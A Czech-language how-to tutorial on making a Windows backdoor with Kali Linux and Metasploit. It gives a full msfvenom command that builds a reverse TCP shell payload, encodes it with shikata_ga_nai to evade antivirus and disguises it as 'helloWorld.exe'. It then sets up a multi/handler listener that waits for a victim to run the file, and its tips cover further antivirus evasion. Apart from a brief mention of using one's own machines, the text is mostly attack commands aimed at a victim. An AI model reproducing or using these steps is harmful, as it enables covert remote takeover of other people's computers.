Zadní vrátka slouží k obejití bezpečnostních mechanismů, často tajně a většinou nezjistitelně. Pomocí MSFvenom, kombinace msfpayload a msfencode, je možné vytvořit backdoor, který se připojí zpět k útočníkovi pomocí reverzního shellu TCP. Abyste si mohli vytvořit zadní vrátka, musíte změnit podpis svého malwaru, abyste se vyhnuli jakémukoli antivirovému softwaru. Dokončete tento projekt na dvojici počítačů, ke kterým máte přístup, a během toho se dozvíte více o zabezpečení počítače a o tom, jak tento druh zadních dveří funguje.
Kroky
Krok 1. Spusťte Kali a spusťte Terminálovou konzolu
Krok 2. Zadejte ifconfig pro zobrazení rozhraní a zkontrolujte vaši IP adresu
Krok 3. Seznam kodérů zobrazíte zadáním kodérů msfvenom -l
Jako kodér použijete x86/shikata_ga_nai
Krok 4. Zadejte „msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86/shikata_ga_nai -f exe> helloWorld.exe
- -a x86 --platform windows označuje architekturu, kterou má použít.
- -p windows/shell/reverse_tcp určuje užitečné zatížení, které má být vloženo.
- LHOST označuje IP adresu posluchače.
- LPORT označuje port posluchače.
- -b "\ x00" označuje, aby se zabránilo špatnému znaku (null bajtů).
- -e x86/shikata_ga_nai určuje název kodérů.
- -f exe> helloWorld.exe určuje výstup formátu.
Krok 5. Aktivujte Metasploit zadáním msfconsole
Nyní jste si vygenerovali zadní vrátka. Když oběť klikne na helloWorld.exe, aktivuje se vložené užitečné zatížení prostředí a vytvoří připojení zpět k vašemu systému. Abyste mohli získat připojení, musíte otevřít více-handler v Metasploitu a nastavit užitečné zatížení
Krok 6. Napište use exploit/multi/handler
Krok 7. Zadejte příkaz set payload windows/shell/reverse_tcp
Krok 8. Chcete -li modul zkontrolovat, zadejte příkaz show options
Krok 9. Zadejte sadu LHOST 192.168.48.129
„LHOST“označuje IP adresu posluchače
Krok 10. Zadejte sadu LPORT 4444
„LPORT“označuje port posluchače
Krok 11. Zadejte příkaz run a počkejte na připojení z počítače oběti
Krok 12. Počkejte, až oběť klikne na helloWorld.exe
Poté budete úspěšně připojeni ke stroji oběti.
Tipy
- Použití -i v MSFvenom bude představovat iterace kódování. Někdy může k obejití AV softwaru pomoci více iterací.
- Naučili jste se generovat zadní vrátka a kódovat je pomocí MSFvenom, ale tato metoda v dnešní době nebude fungovat dokonale proti některému AV softwaru. Důvodem je to, že šablony spouštění v MSFvenom. Dodavatelé AV přidali statický podpis těchto šablon a jen je hledali. Řešením tohoto problému je použít jinou šablonu spuštění nebo jiné nástroje.